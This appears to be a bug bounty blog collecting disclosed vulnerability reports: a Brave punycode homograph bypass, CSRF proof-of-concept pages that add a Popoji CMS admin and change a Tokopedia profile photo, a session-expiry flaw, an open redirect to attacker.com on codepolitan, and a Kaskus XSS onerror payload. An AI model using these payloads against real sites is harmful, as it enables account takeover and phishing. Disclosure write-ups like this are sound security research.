Homograph Attack Bypass On Brave Browser


Hi guys, at this time i try to test Brave Browser , because i challenge myself to test something except website application and will see what i can do with it. While I search about Browser bug in hackerone.com I find report about Homograph attack in browser at 175286 and I try it, but its has been patched, so I find another way to attack it. And I try to read more reference about browser and i read URI Obfuscation  that give me idea how about adding @ when add punycode ? and boom. Its work, Brave Browser not validate a url properly like previous report. And This is My Report, but before i send report I check it on chrome, and the chrome response is showing the true URL.

Summary:

At #175286 you has been patched, and i try it work, but i’ve another way to bypass it. when we add a site to our Homepage with @, it’s not validate a url properly, make sure it’s display the punycode.

Products affected:

Brave 0.18.36 ( Linux & Windows )

Steps To Reproduce:

  • In browser add homepage with IDN @ebаy.com/
  • Now close and open browser again
  • You can see it’s redirect to http://xn--eby-7cd.com/

Video :

And two days after that the Brave team update my report to triaged and give me bounty ( half of first reporter ) , but i not satisfied with that (Am I so greedy ) >.< , and ask information, why ? and Brave team said “this was awarded lower because it requires the URL to start with ‘@’ which users would probably notice since it looks odd” and i think its true, so i dig it again, how can I attack it without ‘@’ and I try different way to attack it, and I’ve found the ‘@’ not required on url, so just use URL like this ebаy.com/ . And the Brave team said “seems valid” and give me extra bounty. Yay !

Thanks.

Missing CSRF Token On Add Admin [Popoji CMS]

Description:

This is happen because when request add admin there’s no CSRF token
Step To Reproduce :

<script>function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST", "http://root/popoji/poadmin/
route.php?mod=user&act=addnew", true);
xhr.withCredentials="true";
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan
dy21%40gmail.com&no_telp=083833232954&level=1');
}
</script>
<button>Let's Rock</button>

1. Save code to .html
2. upload them to host
3. execute it.

Video :

https://www.youtube.com/watch?v=1FXXuSiB6jo

Fix & Mitigation :

give token when request sensitive action.

Note:
them give me permission to disclose it, and they say the patch will deployed for next version. So, if you use popoji CMS, be careful, dont trust any link from unknown people and stay update your CMS. and also them give me bounty for this! yeey !

Session Not Expired When Password Has Been Changed [app.cobalt.io]

Description

When user change password from another platform, the previous platform still connect to account and still can edit the profile.

POC :

1. Login on mozilla,
2. Login on Chrome,
3. change the password on chrome.
4. back to mozilla, you still able to access the account
5. you still can edit profile.

Video :

https://youtu.be/Cz2zh7w4n6M (unlisted )

Note : I ask permission to app.cobalt.io to write it on my blog, and them give me the permission, so I write here,

Hope you enjoy~

Open Redirect On Codepolitan.com

Description : 

Open redirects and forwards are possible when a web application accepts untrusted
input that could cause the web application to redirect the request to a URL contained within untrusted
input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a
phishing scam and steal user credentials. Because the server name in the modified link is identical to the

original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and
forward attacks can also be used to maliciously craft a URL that would pass the application’s access
control check and then forward the attacker to privileged functions that they would normally not be
able to access.

Impact :

Force user go to untrusted website from codepolitan website

Location of bug : 

https://www.codepolitan.com/users/login?callback=

Payload :

http://attacker.com

Reproduce :

1. Open https://www.codepolitan.com/users/login?callback=http://attacker.com
2. Login, and you will be redirect to evil.com

Conclusion : 

Open redirect make user not safe because force user go to untrusted website ( scam
/phising) without user know

Video :

https://youtu.be/uQ2OhTbcVOI 

Note :

Codepolitan crew its very fast on patch the bug, and them also will give me the SWAG and add my name on their hall of fame, yeay !

Credit :

https://www.codepolitan.com/credit-to-bug-reporter

Missing CSRF Token On Change Picture Request [Tokopedia.com]

Hi,

Actually i found many CSRF issue on tokopedia, but i just write this on my blog if you want to see all of them just go to my old blog : http://v1nsh4n.blogspot.co.id/search/label/Tokopedia

Description

This bug because when change picture there’s no CSRF token to cover it.

Vuln Request

POST /ajax/people-4.pl HTTP/1.1
Host: www.tokopedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://www.tokopedia.com/people/9946238/edit
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 526
Cookie: <somecookie>
Connection: close

file_path=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F300%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&file_th=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F100-square%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&message_status=0&pic_obj=eyJzZXJ2ZXJfaWQiOiI1MCIsImZpbGVfcGF0aCI6InVzZXItMS8yMDE3LzQvNy85OTQ2MjM4IiwicGljIjoiOTk0NjIzOF83YWMwMzU3Zi0wNWY3LTRmMzItOTJhNy1iNjliOWIyMzk1NmMucG5nIn0%3D&success=1&action=event_upload_profile_picture

Poc Code:

<script>
      function getMe(){
        // retrieve page content
        var xhr = new XMLHttpRequest();

        // now execute the CSRF attack
        xhr.open("POST", "https://www.tokopedia.com/ajax/people-4.pl", true);
        xhr.withCredentials="true";
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.send('file_path=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F300%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&file_th=https%3A%2F%2Fecs7.tokopedia.net%2Fimg%2Fcache%2F100-square%2Fuser-1%2F2017%2F4%2F7%2F9946238%2F9946238_7ac0357f-05f7-4f32-92a7-b69b9b23956c.png&message_status=0&pic_obj=eyJzZXJ2ZXJfaWQiOiI1MCIsImZpbGVfcGF0aCI6InVzZXItMS8yMDE3LzQvNy85OTQ2MjM4IiwicGljIjoiOTk0NjIzOF83YWMwMzU3Zi0wNWY3LTRmMzItOTJhNy1iNjliOWIyMzk1NmMucG5nIn0%3D&success=1&action=event_upload_profile_picture');
        }
</script>
<button onclick="getMe();">Let's Rock</button>

Note: file_path is another user photo

Step to reproduce:

  • Save Code .html
  • Click `Lets Rock`
  • Photo will be update with photo from file_path

Video : https://youtu.be/jNE2ECG9DRQ

XSS On Kaskus

This is old bug i found on 2016, i write this on my new blog to sharing what i found, because i think its bug is very interesting and unique.

Description

This bug is unique, because XSS exposed when redirect to previous page after login.

Step To Reproduce

  • Go to http://www.kaskus.co.id/thread/57a47e691cbfaa092b8b456a/?ref=header&med=header
  • Change parameter to “><img+src%3Dx+onerror%3Dprompt(‘XSS/By/LocalHost’)%3B>
  • Login with widget on top  and you will redirect
  • And XSS will be exposed

Http Header response : 

username=sebutsajanos&password=&md5password=&md5pass
word_utf=&securitytoken=1470955602-
c2079dd69c8f65d455e977727407176b&url=%252Fthread%252F57a47e691cbfaa092b8b456a%252F%25
3Fref%253Dheader%2526med%253D%252522%25253E%25253Cimg%252Bsrc%25253Dx%252Bonerror
%25253Dprompt%2528%252527XSS%252FBy%252FLocalHost%252527%2529%25253B%25253E

Video : 

Note :

Kaskus Response is very quick and i got SWAG from them.